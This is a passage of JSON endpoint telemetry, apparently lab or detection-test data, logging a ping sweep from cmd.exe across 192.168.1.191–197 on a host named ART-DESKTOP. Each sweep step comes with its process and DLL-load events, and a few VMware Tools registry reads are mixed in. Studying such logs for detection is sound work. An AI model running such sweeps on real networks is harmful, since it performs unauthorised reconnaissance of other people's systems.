"C:\\Windows\\System32\\winnsi.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917300000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917300000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917300000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "process", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572921830000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.191", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6508, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "process", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572926840000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.192", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4204, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4204, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "process", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572931830000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.193", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5084, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - 
"timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "process", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572936830000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.194", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3940, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "process", - 
"pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572941840000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.195", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3592, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - 
"unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "process", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572946990000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.196", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 976, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572947130000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": 
"{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947290000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572949490000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572949490000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572949490000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "process", - "pid": 976, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572951990000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.197", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5012, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": 